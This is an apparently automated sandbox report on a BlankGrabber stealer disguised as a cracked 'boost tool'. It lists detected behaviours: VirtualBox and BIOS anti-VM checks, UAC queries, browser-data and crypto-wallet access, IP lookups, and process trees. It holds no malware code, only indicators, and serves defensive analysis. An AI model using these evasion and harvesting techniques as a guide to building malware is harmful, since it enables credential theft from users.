Malware Analysis Report

2024-10-10 08:29

Sample ID 240622-ral3hs1aja
Target boostup_boost_tool_cracked.zip
SHA256 a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63
Tags
blankgrabber evasion trojan execution spyware stealer themida upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63

Threat Level: Known bad

The file boostup_boost_tool_cracked.zip was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion trojan execution spyware stealer themida upx

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Themida packer

Reads user/profile data of web browsers

UPX packed file

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Enumerates processes with tasklist

Gathers system information

Suspicious use of AdjustPrivilegeToken

Detects videocard installed

Suspicious use of WriteProcessMemory

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-22 13:59

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-22 13:59

Reported

2024-06-22 14:03

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\system32\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\system32\rundll32.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\system32\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 82.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp

Files

memory/2052-1-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-0-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-2-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-3-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-6-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-5-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-4-0x0000000053AF0000-0x00000000544CF000-memory.dmp

memory/2052-7-0x0000000053AF0000-0x00000000544CF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-22 13:59

Reported

2024-06-22 14:02

Platform

win10v2004-20240508-en

Max time kernel

130s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\bound.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3100 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
PID 3100 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe
PID 1404 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 4300 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3740 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1192 wrote to memory of 2820 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1404 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 4300 wrote to memory of 940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4300 wrote to memory of 940 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2376 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2376 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1972 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1972 wrote to memory of 4024 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3740 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 3740 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mshta.exe
PID 972 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 972 wrote to memory of 1888 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1584 wrote to memory of 3264 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1584 wrote to memory of 3264 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\bound.exe
PID 1404 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 3268 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3268 wrote to memory of 2448 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1404 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 3264 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe
PID 3264 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\bound.exe C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe
PID 3836 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3836 wrote to memory of 4036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1404 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1404 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe C:\Windows\system32\cmd.exe
PID 1400 wrote to memory of 3160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1400 wrote to memory of 3160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3892 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe C:\Windows\system32\cmd.exe
PID 3892 wrote to memory of 648 N/A C:\Users\Admin\AppData\Local\Temp\onefile_3264_133635384467530451\loader.exe C:\Windows\system32\cmd.exe
